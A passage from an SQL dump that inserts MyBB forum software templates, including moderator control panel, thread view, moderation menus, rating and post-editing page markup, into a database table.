modcp_nav_modlogs\">{$lang->mcp_nav_modlogs}</a></td></tr>\n </tbody>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpusers\']}.gif\" id=\"modcpusers_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_users}</strong></span></div>\n </td>\n </tr>\n <tbody style=\"{$collapsed[\'modcpusers_e\']}\" id=\"modcpusers_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=finduser\" class=\"modcp_nav_item modcp_nav_editprofile\">{$lang->mcp_nav_editprofile}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=banning\" class=\"modcp_nav_item modcp_nav_banning\">{$lang->mcp_nav_banning}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=warninglogs\" class=\"modcp_nav_item modcp_nav_warninglogs\">{$lang->mcp_nav_warninglogs}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=ipsearch\" class=\"modcp_nav_item modcp_nav_ipsearch\">{$lang->mcp_nav_ipsearch}</a></td></tr>\n </tbody>\n</table>\n</td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('10', 'modcp', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->modcp}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$modcp_nav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"3\"><strong>{$lang->awaiting_moderation}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"23%\"><span class=\"smalltext\"><strong>{$lang->type}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"33%\"><span class=\"smalltext\"><strong>{$lang->number_awaiting}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"44%\"><span class=\"smalltext\"><strong>{$lang->latest}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\"><strong>{$lang->threads}</strong></span></td>\n<td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$unapproved_threads}</span></td>\n<td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$latest_thread}</span></td>\n</tr>\n<tr>\n<td class=\"trow2\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td>\n<td class=\"trow2\" align=\"center\"><span class=\"smalltext\">{$unapproved_posts}</span></td>\n<td class=\"trow2\" align=\"center\"><span class=\"smalltext\">{$latest_post}</span></td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\"><strong>{$lang->attachments}</strong></span></td>\n<td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$unapproved_attachments}</span></td>\n<td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$latest_attachment}</span></td>\n</tr>\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n <td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->latest_5_modactions}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->action}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->information}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->ip}</strong></span></td>\n</tr>\n{$modlogresults}\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"4\"><strong>{$lang->bans_ending_soon}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->reason}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->ban_length}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->ban_bannedby}</strong></span></td>\n</tr>\n{$bannedusers}\n</table>\n<br />\n<form action=\"modcp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_modnotes\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"1\"><strong>{$lang->moderator_notes}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->notes_public_all}</strong></span>\n</td>\n<tr>\n<td class=\"trow1\"><textarea name=\"modnotes\" style=\"width: 99%; height: 200px;\" rows=\"5\" cols=\"45\">{$modnotes}</textarea></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"notessubmit\" value=\"{$lang->save_notes}\" /></div>\n</form>\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('11', 'modcp_reports', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reported_posts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"modcp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"page\" value=\"{$page}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$modcp_nav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"7\"><strong>{$lang->reported_posts_note}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->post_id}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->poster}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reporter}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->report_reason}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->report_time}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"5%\"><input type=\"checkbox\" name=\"allbox\" onclick=\"selectReportedPosts();\" /></td>\n</tr>\n{$reports}\n{$reportspages}\n<tr>\n<td class=\"tfoot\" colspan=\"7\" align=\"right\"><span class=\"smalltext\"><strong><a href=\"modcp.php?action=allreports\">{$lang->view_all_reported_posts}</a></strong></span></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"hidden\" name=\"action\" value=\"do_reports\" /><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->mark_read}\" /></div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n<script type=\"text/javascript\">\n<!--\n var checked = false;\n function selectReportedPosts()\n {\n if(checked == false)\n {\n checked = true;\n $$(\'input[type=\"checkbox\"]\').invoke(\'writeAttribute\', \'checked\', \'checked\');\n }\n else\n {\n checked = false;\n $$(\'input[type=\"checkbox\"]\').invoke(\'writeAttribute\', \'checked\', \'\');\n }\n }\n// -->\n</script>\n</body>\n</html>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('12', 'modcp_modlogs_result', '<tr>\n<td class=\"{$trow}\" valign=\"top\">{$logitem[\'profilelink\']}</td>\n<td class=\"{$trow}\" align=\"center\" valign=\"top\">{$log_date}, {$log_time}</td>\n<td class=\"{$trow}\" align=\"center\" valign=\"top\">{$logitem[\'action\']}</td>\n<td class=\"{$trow}\" align=\"center\" valign=\"top\">{$information}</td>\n<td class=\"{$trow}\" align=\"center\" valign=\"top\">{$logitem[\'ipaddress\']}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('13', 'modcp_modlogs_noresults', '<tr>\n <td class=\"trow1\" align=\"center\" colspan=\"5\">{$lang->error_no_results}</td>\n\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('14', 'modcp_modlogs_multipage', '<tr>\n<td class=\"tcat\" colspan=\"6\"><span class=\"smalltext\"> {$multipage}</span></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('15', 'modcp_ipsearch', '\n <html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->ipsearch}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <form action=\"modcp.php?action=ipsearch\" method=\"post\">\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n {$ipsearch_results}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->ipaddress_search}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->ip_address}</strong></td>\n <td class=\"trow1\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"ipaddress\" value=\"{$ipaddressvalue}\" size=\"30\" /></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\" valign=\"top\"><strong>{$lang->options}</strong></td>\n <td class=\"trow1\" width=\"75%\">\n <label><input type=\"checkbox\" class=\"checkbox\" name=\"search_users\" value=\"1\" {$usersearchselect} />{$lang->search_users}</label><br />\n <label><input type=\"checkbox\" class=\"checkbox\" name=\"search_posts\" value=\"1\" {$postsearchselect} />{$lang->search_posts}</label>\n </td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"submit\" class=\"button\" value=\"{$lang->find}\" />\n </div>\n </td>\n </tr>\n </table>\n </form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('16', 'modcp_ipsearch_results', ' <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" align=\"center\" colspan=\"2\">\n {$misc_info_link}<div><strong>{$lang->ipsearch_results}</strong></div>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->ipaddress}</strong></span></td>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->result}</strong></span></td>\n </tr>\n {$results}\n </table>\n {$multipage}\n <br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('17', 'modcp_ipsearch_misc_info', '<html>\n<head>\n<title>{$lang->ipaddress_misc_info}</title>\n{$headerinclude}\n<style type=\"text/css\">\nbody {\n text-align: left;\n}\n</style>\n</head>\n<body style=\"margin:0; padding: 4px; top: 0; left: 0;\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" align=\"center\" colspan=\"2\">\n <div class=\"float_right\" style=\"margin-top: 3px;\"><span class=\"smalltext\"><a href=\"#\" onclick=\"window.close();\">Close</a></span></div>\n <div><strong>{$lang->ipaddress_misc_info}</strong></div>\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\" align=\"center\">{$lang->ipaddress_host_name}</td>\n <td class=\"trow1\">{$ipaddress_host_name}</td>\n </tr>\n <tr>\n <td class=\"trow2\" width=\"25%\" align=\"center\">{$lang->ipaddress_location}</td>\n <td class=\"trow2\">{$ipaddress_location}</td>\n </tr>\n </table>\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('18', 'modcp_ipsearch_result', '<tr>\n<td class=\"{$trow}\" align=\"center\">{$ip}</td>\n<td class=\"{$trow}\">{$subject}</td>\n</tr>\n', '-2', '1408', '', '1339729416'); INSERT INTO mybb_templates VALUES('19', 'modcp_ipsearch_noresults', '<tr>\n <td class=\"trow1\" align=\"center\" colspan=\"2\">{$lang->error_no_results}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('20', 'header_welcomeblock_member', ' <span style=\"float:right;\">{$lang->welcome_current_time}</span>\n {$lang->welcome_back} (<a href=\"{$mybb->settings[\'bburl\']}/usercp.php\"><strong>{$lang->welcome_usercp}</strong></a>{$modcplink}{$admincplink} &mdash; <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\">{$lang->welcome_logout}</a>)<br />\n <span class=\"links\">\n <a href=\"#\" onclick=\"MyBB.popupWindow(\'{$mybb->settings[\'bburl\']}/misc.php?action=buddypopup\', \'buddyList\', 350, 350);\">{$lang->welcome_open_buddy_list}</a>\n </span>\n <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getnew\">{$lang->welcome_newposts}</a> | <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getdaily\">{$lang->welcome_todaysposts}</a> | <a href=\"{$mybb->settings[\'bburl\']}/private.php\">{$lang->welcome_pms}</a> {$lang->welcome_pms_usage}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('21', 'header_welcomeblock_member_moderator', ' &mdash; <a href=\"{$mybb->settings[\'bburl\']}/modcp.php\">{$lang->welcome_modcp}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('22', 'postbit_online', '<a href=\"online.php\" title=\"{$lang->postbit_status_online}\"><img src=\"{$theme[\'imgdir\']}/buddy_online.gif\" border=\"0\" alt=\"{$lang->postbit_status_online}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('23', 'showthread_moderationoptions', '{$inlinemod}\n<form action=\"moderation.php\" method=\"post\" style=\"margin-top: 0; margin-bottom: 0;\" id=\"moderator_options\">\n <input type=\"hidden\" name=\"modtype\" value=\"thread\" />\n <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <span class=\"smalltext\">\n <strong>{$lang->moderation_options}</strong></span>\n <select name=\"action\" onchange=\"$(\'moderator_options\').submit();\">\n <option value=\"delayedmoderation\">{$lang->delayed_moderation}</option>\n <optgroup label=\"{$lang->standard_mod_tools}\">\n <option value=\"threadnotes\" selected=\"selected\">{$lang->thread_notes}</option>\n <option value=\"openclosethread\">{$lang->open_close_thread}</option>\n <option value=\"deletethread\">{$lang->delete_thread}</option>\n {$adminpolloptions}\n <option value=\"deleteposts\">{$lang->delete_posts}</option>\n <option value=\"move\">{$lang->move_thread}</option>\n <option value=\"stick\">{$lang->stick_unstick_thread}</option>\n <option value=\"split\">{$lang->split_thread}</option>\n <option value=\"merge\">{$lang->merge_threads}</option>\n <option value=\"mergeposts\">{$lang->merge_posts}</option>\n <option value=\"removeredirects\">{$lang->remove_redirects}</option>\n <option value=\"removesubscriptions\">{$lang->remove_subscriptions}</option>\n {$approveunapprovethread}\n </optgroup>\n {$customthreadtools}\n </select>\n {$gobutton}\n</form>\n<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('24', 'showthread_moderationoptions_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customthreadtools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('25', 'showthread_moderationoptions_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('26', 'showthread_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customposttools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('27', 'showthread_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('28', 'showthread_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script>\n<form action=\"moderation.php\" method=\"post\" style=\"margin-top: 0; margin-bottom: 0;\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n<input type=\"hidden\" name=\"modtype\" value=\"inlinepost\" />\n<span class=\"smalltext\"><strong>{$lang->inline_post_moderation}</strong></span>\n<select name=\"action\">\n<optgroup label=\"{$lang->standard_mod_tools}\">\n <option value=\"multideleteposts\">{$lang->inline_delete_posts}</option>\n <option value=\"multimergeposts\">{$lang->inline_merge_posts}</option>\n <option value=\"multisplitposts\">{$lang->inline_split_posts}</option>\n <option value=\"multiapproveposts\">{$lang->inline_approve_posts}</option>\n <option value=\"multiunapproveposts\">{$lang->inline_unapprove_posts}</option>\n</optgroup>\n{$customposttools}\n</select>\n<input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->go} ({$inlinecount})\" id=\"inline_go\" />&nbsp;\n<input type=\"button\" class=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" />\n</form>\n<script type=\"text/javascript\">\n<!--\n var go_text = \"{$lang->inline_go}\";\n var all_text = \"{$threadcount}\";\n var inlineType = \"thread\";\n var inlineId = {$tid};\n// -->\n</script><br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('29', 'showthread_classic_header', '<tr>\n <td class=\"tcat\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->message}</strong></span></td>\n </tr>\n ', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('30', 'showthread', '<html>\n<head>\n<title>{$thread[\'subject\']}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n var quickdelete_confirm = \"{$lang->quickdelete_confirm}\";\n// -->\n</script>\n<script type=\"text/javascript\" src=\"jscripts/thread.js?ver=1603\"></script>\n</head>\n<body>\n {$header}\n {$pollbox}\n <div class=\"float_left\">\n {$multipage}\n\n </div>\n <div class=\"float_right\">\n {$newreply}\n </div>\n {$ratethread}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\">\n <tr>\n <td class=\"thead\" colspan=\"2\">\n <div style=\"float: right;\">\n <span class=\"smalltext\"><strong><a href=\"showthread.php?mode=threaded&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->threaded}</a> | <a href=\"showthread.php?mode=linear&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->linear}</a></strong></span>\n </div>\n <div>\n <strong>{$thread[\'threadprefix\']}{$thread[\'subject\']}</strong>\n </div>\n </td>\n </tr>\n {$classic_header}\n </table>\n <div id=\"posts\">\n {$posts}\n </div>\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"border-top-width: 0;\">\n <tr>\n <td colspan=\"2\" class=\"tfoot\">\n {$search_thread}\n <div>\n <strong>&laquo; <a href=\"{$next_oldest_link}\">{$lang->next_oldest}</a> | <a href=\"{$next_newest_link}\">{$lang->next_newest}</a> &raquo;</strong>\n </div>\n </td>\n </tr>\n </table>\n <div class=\"float_left\">\n {$multipage}\n </div>\n <div style=\"padding-top: 4px;\" class=\"float_right\">\n {$newreply}\n </div>\n <br style=\"clear: both;\" />\n {$quickreply}\n {$threadexbox}\n {$similarthreads}\n <br />\n <div class=\"float_left\">\n <ul class=\"thread_tools\">\n <li class=\"printable\"><a href=\"printthread.php?tid={$tid}\">{$lang->view_printable}</a></li>\n <li class=\"sendthread\"><a href=\"sendthread.php?tid={$tid}\">{$lang->send_thread}</a></li>\n <li class=\"subscription_{$add_remove_subscription}\"><a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;tid={$tid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a></li>\n </ul>\n </div>\n\n <div class=\"float_right\" style=\"text-align: right;\">\n {$moderationoptions}\n {$forumjump}\n </div>\n <br style=\"clear: both;\" />\n {$usersbrowsing}\n {$footer}\n</body>\n</html>', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('31', 'showthread_usersbrowsing', '<br />\n<span class=\"smalltext\">{$lang->users_browsing_thread} {$onlinemembers}{$onlinesep}{$invisonline}{$onlinesep2}{$guestsonline}</span>\n<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('32', 'showthread_usersbrowsing_user', '{$comma}<a href=\"{$user[\'profilelink\']}\" title=\"{$lang->users_browsing_thread_reading} ({$user[\'reading\']})\">{$user[\'username\']}</a>{$invisiblemark}', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('33', 'showthread_ratethread', '<div style=\"margin-top: 6px; padding-right: 10px;\" class=\"float_right\">\n <script type=\"text/javascript\" src=\"jscripts/rating.js?ver=1400\"></script>\n <div id=\"success_rating_{$thread[\'tid\']}\" style=\"float: left; padding-top: 2px; padding-right: 10px;\">&nbsp;</div>\n <strong style=\"float: left; padding-right: 10px;\">{$lang->thread_rating}</strong>\n <div class=\"inline_rating\">\n <ul class=\"star_rating{$not_rated}\" id=\"rating_thread_{$thread[\'tid\']}\">\n <li style=\"width: {$thread[\'width\']}%\" class=\"current_rating\" id=\"current_rating_{$thread[\'tid\']}\">{$ratingvotesav}</li>\n <li><a class=\"one_star\" title=\"{$lang->one_star}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=1&amp;my_post_key={$mybb->post_code}\">1</a></li>\n <li><a class=\"two_stars\" title=\"{$lang->two_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=2&amp;my_post_key={$mybb->post_code}\">2</a></li>\n <li><a class=\"three_stars\" title=\"{$lang->three_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=3&amp;my_post_key={$mybb->post_code}\">3</a></li>\n <li><a class=\"four_stars\" title=\"{$lang->four_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=4&amp;my_post_key={$mybb->post_code}\">4</a></li>\n <li><a class=\"five_stars\" title=\"{$lang->five_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=5&amp;my_post_key={$mybb->post_code}\">5</a></li>\n </ul>\n </div>\n</div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('34', 'forumjump_advanced', '<form action=\"forumdisplay.php\" method=\"get\">\n<span class=\"smalltext\"><strong>{$lang->forumjump}</strong></span>\n<select name=\"{$name}\" onchange=\"window.location=({$forum_link})\">\n<option value=\"-1\" {$jumpsel[\'default\']}>{$lang->forumjump_select}</option>\n<option value=\"-1\">--------------------</option>\n<option value=\"-4\">{$lang->forumjump_pms}</option>\n<option value=\"-3\">{$lang->forumjump_usercp}</option>\n<option value=\"-5\">{$lang->forumjump_wol}</option>\n<option value=\"-2\">{$lang->forumjump_search}</option>\n<option value=\"-1\">{$lang->forumjump_home}</option>\n{$forumjumpbits}\n</select>\n{$gobutton}\n</form>\n', '-2', '1608', '', '1339729416'); INSERT INTO mybb_templates VALUES('35', 'forumdisplay_searchforum', '<form action=\"search.php\" method=\"post\">\n <span class=\"smalltext\"><strong>{$lang->search_forum}</strong></span>\n <input type=\"text\" class=\"textbox\" name=\"keywords\" /> {$gobutton}\n <input type=\"hidden\" name=\"action\" value=\"do_search\" />\n <input type=\"hidden\" name=\"forums\" value=\"{$fid}\" />\n <input type=\"hidden\" name=\"postthread\" value=\"1\" />\n </form><br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('36', 'editpost', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_post}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script>\n</head>\n<body>\n{$header}\n{$preview}\n{$post_errors}\n{$attacherror}\n<form action=\"editpost.php\" method=\"post\" name=\"editpost\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_post}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td>\n<td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td>\n<td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td>\n</tr>\n</table>\n<input type=\"hidden\" name=\"action\" value=\"deletepost\" />\n<input type=\"hidden\" name=\"pid\" value=\"{$pid}\" />\n</form>\n<br />\n<form action=\"editpost.php?pid={$pid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_post}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->subject}</strong></td>\n<td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td>\n</tr>\n{$posticons}\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}:</strong><br /><div style=\"text-align: center;\">{$smilieinserter}</div></td>\n<td class=\"trow2\">\n<textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"3\">{$message}</textarea>\n{$codebuttons}\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label>\n{$disablesmilies}</span>\n</td>\n</tr>\n{$subscriptionmethod}\n{$pollbox}\n</table>\n{$attachbox}\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_post}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_editpost\" />\n<input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" />\n<input type=\"hidden\" name=\"attachmentaid\" value=\"\" />\n<input type=\"hidden\" name=\"attachmentact\" value=\"\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('37', 'editpost_disablesmilies', '<br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" tabindex=\"8\"{$postoptionschecked[\'disablesmilies\']} /> {$lang->options_disablesmilies}</label>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('38', 'newreply', '<html>\n<head>\n<title>{$lang->post_reply_to}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script>\n</head>\n<body>\n{$header}\n{$preview}\n{$maximageserror}\n{$attacherror}\n{$reply_errors}\n<form action=\"newreply.php?tid={$tid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->post_new_reply}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->reply_to}</strong></span></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\" width=\"20%\"><strong>{$lang->post_subject}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td>\n</tr>\n{$posticons}\n<tr>\n<td class=\"trow2\" 